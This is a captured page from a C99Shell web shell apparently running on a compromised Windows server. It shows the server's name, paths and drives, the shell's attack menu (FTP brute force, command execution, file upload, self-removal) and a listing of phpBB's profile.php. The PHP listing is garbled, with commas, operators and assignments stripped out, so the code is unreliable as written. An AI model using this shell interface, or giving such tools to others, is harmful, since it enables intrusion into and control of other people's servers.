!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\phpbb\   drwxrwxrwx
Free 4.1 GB of 39.52 GB (10.36%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     profile.php (3.85 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/***************************************************************************
 *                                profile.php
 *                            -------------------
 *   begin                : Saturday, Feb 13, 2001
 *   copyright            : (C) 2001 The phpBB Group
 *   email                : support@phpbb.com
 *
 *   $Id: profile.php,v 1.193.2.5 2004/11/18 17:49:37 acydburn Exp $
 *
 *
 ***************************************************************************/

/***************************************************************************
 *
 *   This program is free software; you can redistribute it and/or modify
 *   it under the terms of the GNU General Public License as published by
 *   the Free Software Foundation; either version 2 of the License, or
 *   (at your option) any later version.
 *
 ***************************************************************************/

define('IN_PHPBB'true);
$phpbb_root_path './';
include(
$phpbb_root_path 'extension.inc');
include(
$phpbb_root_path 'common.'.$phpEx);

//
// Start session management
//
$userdata session_pagestart($user_ipPAGE_PROFILE);
init_userprefs($userdata);
//
// End session management
//

// session id check
if (!empty($HTTP_POST_VARS['sid']) || !empty($HTTP_GET_VARS['sid']))
{
    
$sid = (!empty($HTTP_POST_VARS['sid'])) ? $HTTP_POST_VARS['sid'] : $HTTP_GET_VARS['sid'];
}
else
{
    
$sid '';
}

//
// Set default email variables
//
$script_name preg_replace('/^\/?(.*?)\/?$/''\1'trim($board_config['script_path']));
$script_name = ( $script_name != '' ) ? $script_name '/profile.'.$phpEx 'profile.'.$phpEx;
$server_name trim($board_config['server_name']);
$server_protocol = ( $board_config['cookie_secure'] ) ? 'https://' 'http://';
$server_port = ( $board_config['server_port'] <> 80 ) ? ':' trim($board_config['server_port']) . '/' '/';

$server_url $server_protocol $server_name $server_port $script_name;

// -----------------------
// Page specific functions
//
function gen_rand_string($hash)
{
    
$chars = array( 'a''A''b''B''c''C''d''D''e''E''f''F''g''G''h''H''i''I''j''J',  'k''K''l''L''m''M''n''N''o''O''p''P''q''Q''r''R''s''S''t''T',  'u''U''v''V''w''W''x''X''y''Y''z''Z''1''2''3''4''5''6''7''8''9''0');
    
    
$max_chars count($chars) - 1;
    
srand( (double) microtime()*1000000);
    
    
$rand_str '';
    for(
$i 0$i 8$i++)
    {
        
$rand_str = ( $i == ) ? $chars[rand(0$max_chars)] : $rand_str $chars[rand(0$max_chars)];
    }

    return ( 
$hash ) ? md5($rand_str) : $rand_str;
}
//
// End page specific functions
// ---------------------------

//
// Start of program proper
//
if ( isset($HTTP_GET_VARS['mode']) || isset($HTTP_POST_VARS['mode']) )
{
    
$mode = ( isset($HTTP_GET_VARS['mode']) ) ? $HTTP_GET_VARS['mode'] : $HTTP_POST_VARS['mode'];
    
$mode htmlspecialchars($mode);

    if ( 
$mode == 'viewprofile' )
    {
        include(
$phpbb_root_path 'includes/usercp_viewprofile.'.$phpEx);
        exit;
    }
    else if ( 
$mode == 'editprofile' || $mode == 'register' )
    {
        if ( !
$userdata['session_logged_in'] && $mode == 'editprofile' )
        {
            
redirect(append_sid("login.$phpEx?redirect=profile.$phpEx&mode=editprofile"true));
        }

        include(
$phpbb_root_path 'includes/usercp_register.'.$phpEx);
        exit;
    }
    else if ( 
$mode == 'confirm' )
    {
        
// Visual Confirmation
        
if ( $userdata['session_logged_in'] )
        {
            exit;
        }

        include(
$phpbb_root_path 'includes/usercp_confirm.'.$phpEx);
        exit;
    }
    else if ( 
$mode == 'sendpassword' )
    {
        include(
$phpbb_root_path 'includes/usercp_sendpasswd.'.$phpEx);
        exit;
    }
    else if ( 
$mode == 'activate' )
    {
        include(
$phpbb_root_path 'includes/usercp_activate.'.$phpEx);
        exit;
    }
    else if ( 
$mode == 'email' )
    {
        include(
$phpbb_root_path 'includes/usercp_email.'.$phpEx);
        exit;
    }
}

redirect(append_sid("index.$phpEx"true));

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--